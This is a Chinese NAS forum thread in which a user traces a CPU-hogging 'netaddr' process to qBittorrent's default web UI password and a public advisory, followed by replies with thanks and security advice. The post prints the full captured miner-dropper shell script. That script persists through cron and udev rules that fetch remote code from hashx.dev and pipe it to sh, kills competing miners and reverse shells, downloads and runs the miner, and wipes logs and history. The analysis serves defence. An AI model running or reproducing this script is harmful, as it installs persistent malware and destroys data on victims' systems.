用qB默认密码，让nas变成矿场

陪玩

用qB默认密码，让nas变成矿场

开场白

nas风扇为何深夜发出异响？ 进程管理中的 netaddr是为何物？ CPU为何常年高温？ 这一切的背后是良心的泯灭，还是道德的沦丧，还是人性的扭曲？

望

最近经常看见有群友反馈，说是一个叫 netaddr的进程占用极高 甚至让CPU温度长期保持在95度以上

出于好奇我寻访到了当地的群友，开启了本次的探索之旅

群友A： 最近我的nas深夜经常发出奇怪的声音

群友B: 最近我的nas里经常有一个叫 netaddr的进程莫名其妙出现了

当地群友传言，这肯定是nas系统在挖矿，果然免费的就是最贵的

闻

于是出于好奇，我进入了群友的nas，打开了资源监控

映入眼帘的就是那群友说的，netaddr占用了大量的CPU 就如同跗骨之蛆一般，即便是重启，过一阵子也会重新出现

进入ssh查看了一下终端

这个进程，似乎是使用qBittorrent用户运行的

问了一下群友，群友一致表示，确实是有安装这个叫qBittorrent的应用

点开应用一看，应用介绍的首句赫然写着：

默认用户名：admin，默认密码：adminadmin

问

这个普遍的问题，在互联网上应该有其他人也发觉了吧？ 但当我问谷歌，只有一位博主有提及到

但是他也没有发现具体原因是什么

只是发现，关闭QB容器后，就能解决这个问题 一切的矛头都指向了qBittorrent

切

在qBittorrent的开源代码仓库中，找到了原因 https://github.com/qbittorrent/qBittorrent/issues/18731 https://github.com/advisories/GHSA-vchq-5hmx-6hmp

All versions of the qBittorrent client through 4.5.5 use default credentials when the web user interface is enabled.

The administrator is not forced to change the default credentials.

As of 4.5.5, this issue has not been fixed.

A remote attacker can use the default credentials to authenticate and execute arbitrary operating system commands using the "external program" feature in the web user interface.

This was reportedly exploited in the wild in March 2023.

大意就是，远程攻击者可以使用默认用户名密码，通过修改"运行外部程序"运行恶意程序

关于netaddr

这个脚本通过移除定时任务、删除文件、移除容器、停止系统服务等行为，将同类的竞争对手赶尽杀绝 再通过定时任务等方式，将该恶意脚本持久化 一个显著的特征就是，挖矿程序以 netaddr这个名称鱼目混珠，这也是近期频现神秘的 netaddr占用大量资源的根本原因

#!/bin/sh
crontab -r >/dev/null 2>&1
(if sudo -n true; then for crons in $(sudo find /etc/cron* -type f); do sudo rm $crons; done; elif [ "$(id -u)" -eq 0 ]; then for crons in $(find /etc/cron* -type f); do rm $crons; done; fi) >/dev/null 2>&1
(if sudo -n true; then echo 0 \* \* \* \* root sh -c "\"(curl -skL [https://hashx.dev](https://hashx.dev) || wget --no-check-certificate -qO - [https://hashx.dev](https://hashx.dev) || lwp-request [https://hashx.dev](https://hashx.dev)) | sh"\" | sudo tee /etc/cron.d/mdadm; elif [ "$(id -u)" -eq 0 ]; then echo 0 \* \* \* \* root sh -c "\"(curl -skL [https://hashx.dev](https://hashx.dev) || wget --no-check-certificate -qO - [https://hashx.dev](https://hashx.dev) || lwp-request [https://hashx.dev](https://hashx.dev)) | sh"\" | tee /etc/cron.d/mdadm; fi) >/dev/null 2>&1
UDEV='SUBSYSTEM=="net", KERNEL!="lo", RUN+="echo 0 \* \* \* \* root sh -c "\"(curl -skL [https://hashx.dev](https://hashx.dev) || wget --no-check-certificate -qO - [https://hashx.dev](https://hashx.dev) || lwp-request [https://hashx.dev](https://hashx.dev)) | sh"\" | (sudo tee /etc/cron.d/mdadm || tee /etc/cron.d/mdadm)"'
(if sudo -n true; then echo $UDEV | sudo tee /etc/udev/rules.d/mdadm; elif [ "$(id -u)" -eq 0 ]; then echo $UDEV | tee /etc/udev/rules.d/mdadm; fi) >/dev/null 2>&1
(ps aux | grep -v grep | grep -aE '[.][s][h]' | awk ' {print $2}' | xargs -I % kill -9 %) >/dev/null 2>&1
(if sudo -n true; then sudo chattr -i /usr/bin/hostctld; fi) >/dev/null 2>&1
(find /dev/shm -type f -exec rm -rf {} \;) >/dev/null 2>&1
(find /tmp -type f -exec rm -rf {} \;) >/dev/null 2>&1
(rm -rf ${HOME}/.local/.c) >/dev/null 2>&1
(rm -rf /dev/shm/.net-io/ /opt/.net/ ~/.config/cron” and ~/.local/bin || sudo rm -rf /dev/shm/.net-io/ /opt/.net/ ~/.config/cron” and ~/.local/bin) >/dev/null 2>&1
(docker stop watchtower tm ; docker rm watchtower tm ; docker stop traffmonetizer) >/dev/null 2>&1
(if sudo -n true && command -v systemctl; then sudo systemctl stop sshb; sudo systemctl disable sshb; sudo systemctl stop log_rotate.service; sudo systemctl disable log_rotate.service; sudo systemctl stop c3pool_miner; sudo systemctl disable c3pool_miner; sudo systemctl stop journalctld; sudo systemctl disable journalctld; sudo systemctl stop hostctld; sudo systemctl disable hostctld; elif [ "$(id -u)" -eq 0 ]; then systemctl stop sshb; systemctl disable sshb; systemctl stop log_rotate.service; systemctl disable log_rotate.service; systemctl stop c3pool_miner; systemctl disable c3pool_miner; systemctl stop journalctld; systemctl disable journalctld; systemctl stop hostctld; systemctl disable hostctld; fi) >/dev/null 2>&1
(pkill -f /bin/xm; rm -rf /bin/xm; pkill -f /bin/wxm; rm -rf /bin/wxm; pkill -f /tmp/.x111/x; rm -rf /tmp/.x111/x) >/dev/null 2>&1
(for badboy in net-io top perfcc pwnkit net_ioaarch64 efm linuxsys miner gitlabw xmp juiceSSH khnug Linux2 kthreaddi kkssl cnrig stratum vscode runsv puma xmrig c3pool kthreaddk supportxmr xmr kthreaddw klibsystem4 kworkerr ipv6_addrconfd ksoftriqd logrotate log_rotate doai_eater SyGIcPtf netsys logsysd logsd auditd journalctld journald xmw xm l**usl-x86 systemd-net Y3Eh agent_linux hostctld lr_bionic lr_focal lr_linux processlib2.so processlib.so rbmx rfmx rotate rotate_cn_rt rotate_low xmrig_arm64 xmrig_freebsd; do ps aux | grep -v grep | grep $badboy | awk ' {print $2}' | xargs -I % kill -9 %; done)  >/dev/null 2>&1
(for port in 3333 4444 5555 7777 14444 5790 45700 2222 9999 20580 13531 9021 9022 4447 9000 13131 13337 13338 13339 19951 44521 10900 63256 11288 7331; do ss -tpn "dst :$port" | grep -Po 'pid=\K\d+' | xargs -r kill; done)  >/dev/null 2>&1
(for thug in 95.216.88.55 146.70.120.58 50.7.74.173 129.13.131.140 199.58.81.140 212.47.244.38 54.187.140.5 173.212.220.247 193.168.143.199 198.211.126.180 154.213.187.153 173.212.220.247 82.153.138.25 157.245.193.241 45.61.143.47 165.22.195.35 165.227.63.241 164.90.149.104 164.90.149.104 192.241.144.69 141.95.72.60 141.95.72.61 141.95.72.59 104.243.43.115 104.243.33.118 139.99.123.196 139.99.124.170 139.99.125.38 141.94.96.144 141.94.96.71 141.94.96.195; do for pid in $(ss -tnp | grep "$thug" | awk '{print $6}' | cut -d',' -f2 | cut -d'=' -f2 | sort -u); do kill -9 $pid; done; done) >/dev/null 2>&1
(ps -eo pid,cmd | grep '/bin/bash -i >/dev/tcp' | awk '{print $1}' | xargs -I % kill -9 %) >/dev/null 2>&1
(ps -eo pid,cmd | grep 'import pty;pty.spawn' | awk '{print $1}' | xargs -I % kill -9 %) >/dev/null 2>&1
((curl -skL [https://hashx.dev/fun](https://hashx.dev/fun) || wget --no-check-certificate -qO - [https://hashx.dev/fun](https://hashx.dev/fun) || lwp-request [https://hashx.dev/fun](https://hashx.dev/fun)) | bash) >/dev/null 2>&1
RUN=$(ps -ef | grep 'netaddr' | grep -v 'defunct' | grep -v 'grep' | wc -l)
if [ $RUN -gt 0 ]; then
    exit 1
fi
(ps -eo pid,%cpu --sort=-%cpu | awk '$2 > 80 {print $1}' | xargs -I % kill -9 %) >/dev/null 2>&1
(curl -ksL [https://hashx.dev/netaddr](https://hashx.dev/netaddr) -o /tmp/netaddr || wget --no-check-certificate -qO /tmp/netaddr [https://hashx.dev/netaddr](https://hashx.dev/netaddr) || lwp-download [https://hashx.dev/netaddr](https://hashx.dev/netaddr) /tmp/netaddr)
(curl -ksL [https://hashx.dev/netaddra](https://hashx.dev/netaddra) -o /tmp/netaddra || wget --no-check-certificate -qO /tmp/netaddra [https://hashx.dev/netaddra](https://hashx.dev/netaddra) || lwp-download [https://hashx.dev/netaddra](https://hashx.dev/netaddra) /tmp/netaddra)
(curl -ksL [https://hashx.dev/netaddrf](https://hashx.dev/netaddrf) -o /tmp/netaddrf || wget --no-check-certificate -qO /tmp/netaddrf [https://hashx.dev/netaddrf](https://hashx.dev/netaddrf) || lwp-download [https://hashx.dev/netaddrf](https://hashx.dev/netaddrf) /tmp/netaddrf)
cd /tmp;chmod +x netaddr*;./netaddr || ./netaddra || ./netaddrf;rm -rf netaddr*
(if sudo -n true; then for logs in $(sudo find /var/log -type f); do sudo rm $logs; done; elif [ "$(id -u)" -eq 0 ]; then for logs in $(find /var/log -type f); do rm $logs; done; fi) >/dev/null 2>&1
(rm $HOME/.bash_history) >/dev/null 2>&1
(history -c) >/dev/null 2>&1

得益于Linux优秀的权限控制，在未取得root权限时，持久化等操作均不能生效 索幸本次观察到的 netaddr都是使用qBittorrent用户运行的

结束语

QB有风险，使用需谨慎 要想用的欢，就把密码换

至于群友们后来怎么样了 重装QB应用套件修改默认密码后再也没被 netaddr缠上

所以fnOS官方什么时候给“资源监控-进程”那边加一列"用户名称"？

[/s]

乔布斯

这就不得不提一下密码管理器的好处了。。密码我自己都不知道。。

Tavion

支持支持

hsh

厉害厉害

lalala

所以现在应用中心安装的Qbit， 都需要设置个性化密码， 不再使用默认密码

陪玩

但似乎从旧版直接更新的那批还是在那边天天被人搞去挖矿

lnas

能公网访问的就别偷懒用默认密码吧

yibaogang

话说飞牛怎么没有Aria2NG 呀  我只会用这个脱机下载， 这个下载磁力BT  我个人感觉挺好用的！

陪玩

有部分群友好像不知道自己有V6，在下东西的时候不是可以看见别人的IP么，然后就被人顺藤摸瓜摸进去了

djh0558

支持支持

ttpc

支持你的说法

桃子

在当今数字化时代，网络安全至关重要。我们的生活与网络紧密相连，保护个人账号安全是每个人的责任。

首先，切勿设置常见或简单的密码。诸如 “123456”“password” “admin”等密码极易被破解，给不法分子可乘之机。应选择复杂且独特的密码，包含字母、数字和特殊字符。其次，要经常更新密码。定期更换密码可以有效降低账号被入侵的风险。同时，保护自己的账号，不随意在不可信的网站或平台输入账号密码。 此外，绝对不要泄露私密信息。个人信息一旦落入坏人手中，可能带来严重后果。我们要时刻保持警惕，谨慎对待网络上的各种请求和诱惑。 让我们共同重视网络安全，不管是玩飞牛、群辉、还是其他系统，从设置安全密码、保护账号和不泄露私密信息做起。

dillwemyss

我在九月初就发现这个问题了，然后在群里问了也没得到答案。之后是改用了系统自带的下载，发现没问题

pcsoul

谢谢分享。还想问一下，这个不安装qb就不会发生吗

黑神话悟空

学习学习，赶紧跑去把QB卸载重装  重置密码了

daywsid

赶紧去检查一下

快乐的小孩子

学习了，厉害

杨永锋

这个好厉害啊

清风_zDhp5

没把nas放在公网只在局域网使用应该没有问题吧

陪玩

但是现在ipv6开始普及了，就容易被人顺藤摸瓜爆了

cxd1211

感谢大神分享

哎呀小六

好一个望闻问切，哈哈哈哈哈哈哈

蒋大爷

陪玩 发表于 2024-10-18 21:20
有部分群友好像不知道自己有V6，在下东西的时候不是可以看见别人的IP么，然后就被人顺藤摸瓜摸进去了 ...

有一说一，我当时玩pt看自己的ip一直在网页的后台显示就有这个担心，我还因为好奇试过登陆qb界面上其他ip，不过没打开过

陪玩

端口要对，现在下个热门资源，扫一下端口十个有七个是有开放服务的

light9394

使用这类软件不是进去都要首先修改账户密码吗？

jhq

顶一顶               

feixiang

    p3terx/ariang --port 6880 --ipv6

    p3terx/aria2-pro


可以自己安装。

chuanchuan

臣等附议

banggu323

强烈支持

yaogege

学到了厉害了

总xx

飞牛怎么改qb、tr这些软件的密码？是一定要重装吗

E叶清风

不要一班的牛

1024_keXxh

不错不错不错

1024_keXxh

不错不错不错

1024_keXxh

不错不错不错

1024_keXxh

不错不错不错

路xx

谢谢大佬分享

echo

支持支持

遗世楚风

IstoreOS遇到过，不过我不记得是否有安装过qB了；当时排查了网心云、迅雷、科学插件，通通卸载了还是一样，重启也是一样，后来弃用IstoreOS。
因为是小白，不会深入排查，也弄不清楚原因，后来在IstoreOS群里问也没有搭理，就弃用了。
症状就是软路由IstoreOS的IP地址持续不断的上传，上传速度1MB/s；光猫后台也能看到是在持续上传。

遗世楚风

之所以提到网心云，平不是用过网心云，是点击安装过，然后卸载了；以为是卸载的不干净导致的

erenqiu

感谢分享我赶紧修改一下

lunzilunzi

用tr, 没这烦恼

嘉轩x

支持支持

燚蠡🐠

很好很好，我都用自带的下载工具，没额外安装。

弱电智能化

我封了除了ipv6反代之外的所有入站连接，这们是不是就不会被入侵了，不过我还是要看看密码是不是默认密码。

One_SONY

**，还有这种事！

中之易

我以前在omv上也出现过，找了半天才查到是QB，现在我都把QB容器停了

idboygirl

谢谢分享

v3012t

分析的很好，找到问题点，用NAS远程访问不能图省力设置太简单的密码容易被攻击控制

慧生于觉

直接的问题是QB导致的，折射出来的是网络安全意识不足
这是常见的弱口令导致系统被攻陷的案例。所幸对方只是寻求拿来挖矿，而没有做进一步的进攻。
前几天听一个本省网安大牛分享的案例：
====
现在很多经济类病毒攻击手段是先潜伏一段时间（半个月甚至半年）潜伏期主要是感染局域网，半年后开始帮你下载全家桶（脱裤，挖矿），脱裤的数据以及本地数据会视经济价值拿出去卖（比如暗网上卖的个人信息，企业数据库等等），挖矿自然就是取财。 挖矿差不多了之后搞勒索（针对企业，集中性全内网爆发）
====

其实解决方案不仅仅是改某几个应用的弱口令，而是压根不该把应用的web端直接映射出去，即便是中等强度密码映射到外网也有被爆破的风险以及出现0day漏洞被攻陷的风险。应该考虑用专业的VPN软件作为关口，外网登录一律要求VPN进入，VPN设置足够强度密码并且保持VPN及时更新、有动态密码的开启动态密码保护等加固措施。

另外，广义的弱口令包括几种：
1.口令自身强度不足，这就是传统的 位数、元素数量（数字、大写、小写、符号）、规律性（比如单词，缩写等）
2.密码泄露。比如一个账号全部门公用，一个账号全部平台用（之前就爆发过撞库攻击，一组用户名和密码用在各种网站，其中某站被攻击，攻击者解出用户名密码后广泛测试，攻陷了一堆系统）
3.密码长期不更新，这也是撞库攻击的手的一个重要原因；
4.密码保管不善，比如电脑上建文本文件明文存全部账号，电脑中毒直接被一网打尽。还有的大佬轻信不明开发者开发的密码管理软件存储了大量系统账号密码（后果我就不说了）